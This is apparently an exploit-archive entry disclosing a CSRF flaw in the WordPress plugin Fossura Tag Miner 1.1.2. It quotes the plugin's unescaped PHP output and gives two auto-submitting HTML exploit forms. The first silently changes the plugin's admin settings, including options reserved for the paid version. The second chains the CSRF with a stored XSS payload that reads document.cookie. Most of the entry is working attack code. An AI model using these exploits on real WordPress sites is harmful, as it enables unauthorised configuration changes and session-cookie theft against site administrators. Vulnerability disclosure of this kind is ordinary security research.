Wordpress Tag Miner Cross Site Request Forgery

2015-08-19
ID: 81221
CVE: None
Download vulnerable application: None
######################
# Exploit Title : 
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/fossura-tag-miner/
# Date: 2015-08-18
# Tested On : Windows - Firefox
# Software Link : https://downloads.wordpress.org/plugin/fossura-tag-miner.1.1.2.zip
# Version : 1.1.2
######################
# Explanation:
# This plugin had a xss bug before but now i checked it and i found a CSRF bug in options page. there is no Token for Patching CSRF and you can Send Request to it.
# As you now there is a xss bug in this page in fossura-tag-miner-admin.php - Line 364 , 369:

if ( isset($_POST['fossura_tags_number'] ) ) {
$number = $_POST['fossura_tags_number'];
}
echo '<p>';
echo "<input type=text name=$name value=$number " . $disabled . ">";
echo '</p>';

# And you can use CSRF and XSS together.
# Another thing is: as default some of options is disabled because of the professional version, but you can change this options through this CSRF.

# Exploit 1 (Just CSRF):
<form name="form1" method="POST" action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=fossura-tag-miner">
<input type="hidden" name="fossura_tag_miner_update_settings" value="hunne" />
<input type="hidden" name="fossura_tags_mode" value="classic" />
<input type="hidden" name="fossura_tags_trigger" value="publish" />
<input type="hidden" name="fossura_tags_number" value='CSRFBug'>
<input type="hidden" name="fossura_tags_dates" value="true"  />
<input type="hidden" name="fossura_tags_pronouns" value="true"  />
<input type="hidden" value="Save settings" class="button-primary"/>
</form>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
# Exploit 2 (CSRF & XSS):
<form name="form1" method="POST" action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=fossura-tag-miner">
<input type="hidden" name="fossura_tag_miner_update_settings" value="hunne" />
<input type="hidden" name="fossura_tags_mode" value="classic" />
<input type="hidden" name="fossura_tags_trigger" value="publish" />
<input type="hidden" name="fossura_tags_number" value='"><script>alert(document.cookie)"'>
<input type="hidden" name="fossura_tags_dates" value="true"  />
<input type="hidden" name="fossura_tags_pronouns" value="true"  />
<input type="hidden" value="Save settings" class="button-primary"/>
</form>
<script language="Javascript">
setTimeout('form1.submit()', 1);
</script>
######################
# Discovered By : Ehsan Hosseini.
######################
1-4-2 (www02)